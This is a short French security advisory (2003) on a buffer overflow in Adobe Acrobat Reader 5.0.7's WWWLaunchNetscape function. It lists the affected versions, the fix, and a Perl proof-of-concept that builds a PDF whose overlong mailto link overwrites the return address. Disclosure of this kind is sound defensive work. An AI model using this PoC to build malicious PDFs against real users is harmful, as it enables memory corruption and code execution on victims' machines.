|
Adobe Acrobat Reader 5.0.7 Buffer Overflow Vulnerability
|
Date de Publication: 2003-07-01
Titre: Adobe Acrobat Reader 5.0.7 Buffer Overflow Vulnerability
K-Otik ID : 0219
Exploitable à distance : Oui
Exploitable en local : Oui
|
|
* Description Technique - Exploit *
Acrobat Reader souffre d'une vulnérabilité de type buffer overflow, qui pourrait être exploitée par un attaquant distant afin d'exécuter un code arbitraire en incitant l'utilisateur à cliquer sur un lien malicieux. Cette faille se situe dans la fonction WWWLaunchNetscape qui utilise un buffer de 256 bytes pour stocker un lien.
|
-------------------------- Proof of Concept --------------------------
#!/usr/bin/perl
#
# Adobe Acrobat Reader 5.0.7 Buffer Overflow Vulnerability
# PoC exploit by mcbethh / sec-labs
#
# This script will generate poc505.pdf file. Open it in
# adobe acrobat and click on 'click here' link.
# Vulnerable function is WWWLaunchNetscape. Use gdb to see
# that return address was overwritten (by 0x41414141).
open P, ">poc507.tex";
print P '
\documentclass{letter}
\usepackage{hyperref}
\begin{document}
\href{mailto:x'.('X'x508).'AAAA}{\texttt{click here}}
\end{document}';
close P;
system ("pdflatex poc507.tex");
system ("rm -f poc507.tex poc507.out poc507.log poc507.aux");
-------------------------------------------------------------------------
* Versions Vulnérables *
Adobe Acrobat Reader v5.0.7 et inférieures.
* Solution *
Utiliser Adobe Acrobat Reader 6.0
* Crédits *
Failles découverte par sec-labs team (Juillet 2003).
|
